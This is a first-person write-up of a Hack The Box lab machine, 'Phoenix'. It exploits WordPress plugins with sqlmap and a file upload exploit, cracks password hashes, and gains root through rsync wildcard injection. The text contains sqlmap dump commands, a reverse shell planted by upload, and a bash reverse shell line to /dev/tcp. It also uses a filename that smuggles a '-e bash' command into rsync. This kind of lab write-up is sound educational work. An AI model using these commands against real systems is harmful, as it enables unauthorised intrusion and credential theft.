Phoenix is a machine with the Linux OS and a difficulty level classified as hard. This machine was retired a few days ago. However, due to being busy with end-of-semester assignments and upcoming exams, I only recently managed to write about it.

Machine IP: 10.10.11.149

As always, I performed a port scan to identify the services running on the machine using Nmap.

Nmap scan report for 10.10.11.149
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http     Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp  open     ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Not valid before: 2022-02-15T20:08:43
|_Not valid after:  2032-02-13T20:08:43
| tls-alpn:
|   h2
|_  http/1.1
2179/tcp filtered vmrdp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I found several open ports such as 22, 80, and 443. Since the website on port 80 redirects to port 443 (https) with the domain phoenix.htb, I added this domain to my hosts file.

web

When I viewed the source of the website, I discovered that it uses WordPress. So, I scanned for themes and plugins using WPScan.

$ wpscan --url https://phoenix.htb/ --disable-tls-checks
<REDACTED>
[+] asgaros-forum
 | Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
 | Last Updated: 2022-01-30T12:54:00.000Z
 | [!] The version is out of date, the latest version is 2.0.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.15.12 (10% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12
<REDACTED>

Since the plugin was outdated, I searched for vulnerabilities in the plugin and found CVE-2021-24827.

cve

After discovering this vulnerability, I exploited it using SQLMap.

sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --dbs

Suspecting there might be more plugins, I performed further enumeration with SQLMap using the following command:

sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump

The plugins found included:

  • accordion-slider-gallery
  • adminimize
  • asgaros-forum
  • download-from-files
  • minionrange-2-factor-authentication
  • photo-gallery-builder
  • pie-register
  • simple-local-avatars
  • timeline-event-history

Among these, the download-from-files plugin was vulnerable to arbitrary file upload. I found an exploit for this vulnerability on Exploit-DB.

cve

I used the available exploit from Exploit-DB to upload a PHP reverse shell.

$ python3 exploit.py https://phoenix.htb/ ../rev.phtml
Download From Files <= 1.48 - Arbitrary File Upload
Author -> spacehen (www.github.com/spacehen)
Uploading Shell...
Shell Uploaded!
https://phoenix.htb/wp-admin/rev.phtml

I started a listener using Netcat, accessed the reverse shell URL, and got a connection from the machine to the listener.

revshell

After obtaining a reverse shell, I performed enumeration using LinPeas and found credentials for the WordPress database. I then retrieved the usernames and passwords from the wp_users table.

mysql

I cracked several passwords using John the Ripper with the RockYou wordlist and found valid SSH credentials: editor:superphoenix. However, there was a verification code required. Further enumeration revealed a file /etc/security/access-local.conf with the following rules:

+ : ALL : 10.11.12.13/24
- : ALL : ALL

I then logged in to SSH through the reverse shell by upgrading the tty and using the regular SSH command.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
wp_user@phoenix:/$ ssh editor@10.11.12.13
$$$$$$$\  $$\                                     $$\
$$  __$$\ $$ |                                    \__|
$$ |  $$ |$$$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$\  $$\ $$\   $$\
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |\$$\ $$  |
$$  ____/ $$ |  $$ |$$ /  $$ |$$$$$$$$ |$$ |  $$ |$$ | \$$$$  /
$$ |      $$ |  $$ |$$ |  $$ |$$   ____|$$ |  $$ |$$ | $$  $$<
$$ |      $$ |  $$ |\$$$$$$  |\$$$$$$$\ $$ |  $$ |$$ |$$  /\$$\
\__|      \__|  \__| \______/  \_______|\__|  \__|\__|\__/  \__|
Password: superphoenix
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)
<REDACTED>
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
editor@phoenix:~$ cat user.txt
e8ba02d7b9af2<REDACTED>

After gaining SSH access as the user editor, I found that the /backups folder was writable. Further enumeration revealed a binary file cron.sh.x in /usr/local/bin.

editor@phoenix:/$ ls -l | grep backups
drwxr-x---   2 editor editor  4096 Jun 27 08:57 backups
editor@phoenix:/$ ls -l /usr/local/bin
total 16
-rwxr-xr-x 1 root root 15392 Feb 16 22:27 cron.sh.x
editor@phoenix:/$ file /usr/local/bin/cron.sh.x
/usr/local/bin/cron.sh.x: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7afde696e476ac5d8300e407cbfb9ec08a9b7f07, for GNU/Linux 3.2.0, stripped

cron.sh.x was a compiled shell script using shc. Unable to decompile it with UnSHc, I used pspy64 to monitor its activity.

editor@phoenix:/tmp$ ./pspy64 &
editor@phoenix:/tmp$ /usr/local/bin/cron.sh.x
<REDACTED>
#!/bin/sh
NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"
cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/
<REDACTED>

From the script source, I discovered that I could perform wildcard injection on the rsync command. The rsync command’s -e option is used to execute commands. (Reference: https://systemweakness.com/privilege-escalation-using-wildcard-injection-tar-wildcard-injection-a57bc81df61c)

I created a malicious script to exploit this:

editor@phoenix:/backups$ echo -e 'bash -c "bash -i >& /dev/tcp/<IP>/<PORT> 0>&1"' > x.sh
editor@phoenix:/backups$ touch -- '-e bash x.sh'
editor@phoenix:/backups$ ls
'-e bash x.sh'
<REDACTED>
x.sh

I started a listener on my local machine and waited for a connection from the machine.

$ nc -nvlp 5555
Listening on 0.0.0.0 5555
Connection received on 10.10.11.149 47634
bash: cannot set terminal process group (38509): Inappropriate ioctl for device
bash: no job control in this shell
root@phoenix:/backups# id
uid=0(root) gid=0(root) groups=0(root)
root@phoenix:/backups#

 cat /root/root.txt
e58a0f73b3337<REDACTED>

Rooted!